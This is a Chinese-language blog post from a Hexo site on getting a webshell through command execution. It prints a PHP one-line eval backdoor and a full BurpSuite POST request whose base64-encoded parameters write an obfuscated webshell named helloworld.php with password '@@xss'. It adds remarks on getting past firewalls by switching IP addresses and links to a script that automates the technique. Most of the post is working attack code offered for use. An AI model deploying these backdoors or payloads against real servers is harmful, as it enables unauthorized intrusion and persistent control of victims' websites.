<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="具体思路上传大马主要是进行提权等操作，笔者遇到写入一句话后不能使用中国菜刀等工具连接，一句话仅能够执行命令如phpinfo(),因此我就想出另一个思路,通过执行命令来写入一个webshell，进过自己的试验，能够成功的写入webshell。但是有一个问题就是，有的有墙啊狗啊什么的时候，只有一次写入的机会，ip就会被ko了。更换个ip以后能够成功的访问到shell.如下是具体的思路分享。 普通PHP">
<meta property="og:type" content="article">
<meta property="og:title" content="命令执行getshell">
<meta property="og:url" content="http://yoursite.com/2019/02/28/命令执行getshell/index.html">
<meta property="og:site_name" content="MagicZ">
<meta property="og:description" content="具体思路上传大马主要是进行提权等操作，笔者遇到写入一句话后不能使用中国菜刀等工具连接，一句话仅能够执行命令如phpinfo(),因此我就想出另一个思路,通过执行命令来写入一个webshell，进过自己的试验，能够成功的写入webshell。但是有一个问题就是，有的有墙啊狗啊什么的时候，只有一次写入的机会，ip就会被ko了。更换个ip以后能够成功的访问到shell.如下是具体的思路分享。 普通PHP">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/images/eval_1.png">
<meta property="og:image" content="http://yoursite.com/images/eval_2.png">
<meta property="og:image" content="http://yoursite.com/images/eval_3.png">
<meta property="og:updated_time" content="2019-02-28T07:04:37.614Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="命令执行getshell">
<meta name="twitter:description" content="具体思路上传大马主要是进行提权等操作，笔者遇到写入一句话后不能使用中国菜刀等工具连接，一句话仅能够执行命令如phpinfo(),因此我就想出另一个思路,通过执行命令来写入一个webshell，进过自己的试验，能够成功的写入webshell。但是有一个问题就是，有的有墙啊狗啊什么的时候，只有一次写入的机会，ip就会被ko了。更换个ip以后能够成功的访问到shell.如下是具体的思路分享。 普通PHP">
<meta name="twitter:image" content="http://yoursite.com/images/eval_1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/02/28/命令执行getshell/">





  <title>命令执行getshell | MagicZ</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">MagicZ</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/02/28/命令执行getshell/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="JhonMess">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="MagicZ">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">命令执行getshell</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-02-28T13:49:00+08:00">
                2019-02-28
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="具体思路"><a href="#具体思路" class="headerlink" title="具体思路"></a>具体思路</h3><p>上传大马主要是进行提权等操作，笔者遇到写入一句话后不能使用中国菜刀等工具连接，一句话仅能够执行命令如phpinfo(),因此我就想出另一个思路,通过执行命令来写入一个webshell，进过自己的试验，能够成功的写入webshell。但是有一个问题就是，有的有墙啊狗啊什么的时候，只有一次写入的机会，ip就会被ko了。更换个ip以后能够成功的访问到shell.如下是具体的思路分享。</p>
<h3 id="普通PHP一句话木马"><a href="#普通PHP一句话木马" class="headerlink" title="普通PHP一句话木马"></a>普通PHP一句话木马</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_POST[&apos;xss&apos;]);?&gt;</span><br></pre></td></tr></table></figure>
<p>这个一句话木马就是一个简单的命令执行，如何利用命令执行来上传一个webshell<br>如下是使用命令执行通过BurpSuite写入网站一个webshell;</p>
<a id="more"></a>
<h3 id="burpsuite写webshell"><a href="#burpsuite写webshell" class="headerlink" title="burpsuite写webshell"></a>burpsuite写webshell</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">POST /mm.php HTTP/1.1</span><br><span class="line">Host: 192.168.1.103:8889</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 2313</span><br><span class="line"></span><br><span class="line">xss=@eval(base64_decode($_POST[action]));</span><br><span class="line">&amp;action=JG15ZmlsZT1mb3BlbigiLi9oZWxsb3dvcmxkLnBocCIsInciKTtmd3JpdGUoJG15ZmlsZSxiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZDEnXSkpO2VjaG8gIjEiOw==</span><br><span class="line">&amp;d1=PD9waHAKJHBhc3N3b3JkPSdAQHhzcyc7CiRodG1sPSckcGFzc3dvcmQnLic9Jy4iJyIuJHBhc3N3b3JkLiInOyIuJ0BlI2h0bWwnLicnLid2Jy4iIi4nJy4nJy4iIi4nJy4nJy4nJy4nYScuJycuJ2woJy4nZycuJycuIiIuJycuJycuJ3onLidpJy4nJy4nJy4nbicuJ2YnLidsJy4nJy4nJy4iIi4nYScuJ3QnLidlKGInLidhcycuJycuJycuJycuIiIuJycuJ2UnLic2Jy4nJy4iIi4nJy4iIi4iIi4iIi4nJy4nNF8nLidkJy4nZScuJ2MnLicnLicnLicnLiIiLicnLiIiLidvJy4nZCcuJ2UnLicoJy4iJ2xWWmhiNXRJRVAwZUtmOWhnNklDRXVmZ1hCeTFzU0kxVFRISktjWTVqSnNtYllUd3NwaXRNVXQzU1dpVCtyL2ZMTFpqak4zVXh4ZkU3c3liTjI5blp0bmRJWnd6N25PU01aN1RkS1NaZW50M1J4QWhLRXQ5a1FjODErUUtqWkMyUjRVZ3ViYnY5NjErLzdMbmZGR3lPQXN5cXR6ck9ucmUzVUh3N0dOMGlsUzFQZjk2RUlRSEk1TG1jclhMbm1pU0JBZEhEUk5wbUUyeUlLZkRoTFJSdDM5cG9lT0cyVVkzTkExWklaRGpvVmJqVUYvaThBUVFob0VneDBkK1NEQUxpYmI2cGR3TzRuN1hkcXpoMzNmZHJ2blA0NjBaMnVGaHgzTStmNkREVDltaGQ1RzVvZG42Nk55MDRrL044YnZ6MGVtcG91dVZDQTRwNmpHVXE2Y1AxME03aVlPbWV4bDhkdjd0MlhIUnRUdGpiSTlhMk80VWdUZmcrTnRkY25zNExtNjl1QlhjWlBuZFUvSkliS2ZvM1RnOG5NU1RxMEpHbWdlU1FrWVBLYzZsdnVRSEZiblExRWd3UEdZWlNkV2xraVdyaEtaalNEd0x1Q0ErVU5Ra3p3VlVhZkg5Z2ZDZllGS2FmbEZCMDFpOXJ4ckVURWoxUmM1emxyQ0NjRzF1S2pmVSt4V3dLQVBMRnpKYTZXdWd0NmFCOXFGT1VqWjdBNVNCbW1iVlUyWUYzaXZrUzBUMklJTXJ0dVdoZytjWjJTbTY4THpyZzJiRC9NcS9wa3A3ZzBjRFhDNGc5Z2w2TGpsTVg3VWNRSkg5ZFNhcjdBVDkveHA3RmZxY3BTa3B6K29FblNkTUVHbTl5U01xT00ySjFNQW92ZlU2SWsxakVvU0VneHJOK2g1bWFRN3NoVlNxRGx6RU5DSFFleEZoVVNueG1zYUxRaUh5N0VZRTZxbGtjV1MrTzY2emVEbXFKWnRUWkc1RVhDWFdtQlVZMllBMy9WT0lOMitRTnVjSCtZRjA2TmN2VkZtUWF1cS81MUFSenZ4eitOcG5oT1dobGJxdGlTNmJacEZnWlhPT01GMjI2eDRVZk1aQVZtd3M1b1F1czFwcll3eWJQazFwcnI2eVQzNFFYRzl6SEFPWkYyK3R5clZjaGJITE1waThPRGJRK2NDOTZsMTdQcnhtZExheTlpNjdWbS9nUWQrMnRySjNMVy9nT3A1NzV2UTdsbXNnengxWTI5SHFXKzZaYlRtZVVabitLME1HTDNLVlNram5OZHo1b1MxM3RqZ01FTTZINHRmVUlJRXBKMmVsSDIyYXFEbVpaTExSM2tmUVYydmp0SXdBRnZsUGJXYXA2eHZLNWoyZFpJbThIbFRWbUNPdWdWUm9LaUZKUGxKK2xvWWRpS2xzaHBSMFpBTCtvaVJYdUZVRTJKVC9IalJTRkNTQzFNcHFOdmZsN1o0RWVKWXQyQU1qQlp6eHlxbXNYK3JnUEhxaWFaUUVlZjJ5QmQ4S3MrbnM5MkNMdndQeUdDUWJMUUJzK2g4PScpKSk7IjskY3NzPWJhc2U2NF9kZWNvZGUoIlEzSmxZWFJsWDBaMWJtTjBhVzl1Iik7JHN0eWxlPSRjc3MoJycscHJlZ19yZXBsYWNlKCIvI2h0bWwvIiwiIiwkaHRtbCkpOyRzdHlsZSgpOy8qKSk7Lic8bGlua3JlbD0ic3R5bGVzaGVldCJocmVmPSIkI2NzcyIvPic7Ki8K</span><br></pre></td></tr></table></figure>
<p>请求头中post三个参数, xss是要执行的PHP代码,action是写入webshell的操作,经过解码之后:<img src="/images/eval_1.png" alt>注意：为防止特殊字符转码问题,统一使用base64转码再解码. d1(一)参数是要写入的webshell,也是通过base64编码.(webshell可以自己填入，这里的只是个思路。)</p>
<h3 id="输出结果"><a href="#输出结果" class="headerlink" title="输出结果"></a>输出结果</h3><p>写入成功后会在response中返回 1 ，代表写入成功。webshell路径和一句话木马的路径一样，文件名为：helloworld.php 密码：@@xss<br><img src="/images/eval_2.png" alt></p>
<h3 id="Webshell写入脚本"><a href="#Webshell写入脚本" class="headerlink" title="Webshell写入脚本"></a>Webshell写入脚本</h3><p>下载地址：<a href="https://github.com/hatmagic/webshellWrite/" target="_blank" rel="noopener">Github</a></p>
<p>脚本的运行结果如图所示：<br><img src="/images/eval_3.png" alt></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/02/27/test/" rel="next" title="hexo安装教程">
                <i class="fa fa-chevron-left"></i> hexo安装教程
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/02/28/CTF漏洞函数总结/" rel="prev" title="CTF漏洞函数总结">
                CTF漏洞函数总结 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">JhonMess</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#具体思路"><span class="nav-number">1.</span> <span class="nav-text">具体思路</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#普通PHP一句话木马"><span class="nav-number">2.</span> <span class="nav-text">普通PHP一句话木马</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#burpsuite写webshell"><span class="nav-number">3.</span> <span class="nav-text">burpsuite写webshell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#输出结果"><span class="nav-number">4.</span> <span class="nav-text">输出结果</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Webshell写入脚本"><span class="nav-number">5.</span> <span class="nav-text">Webshell写入脚本</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">JhonMess</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
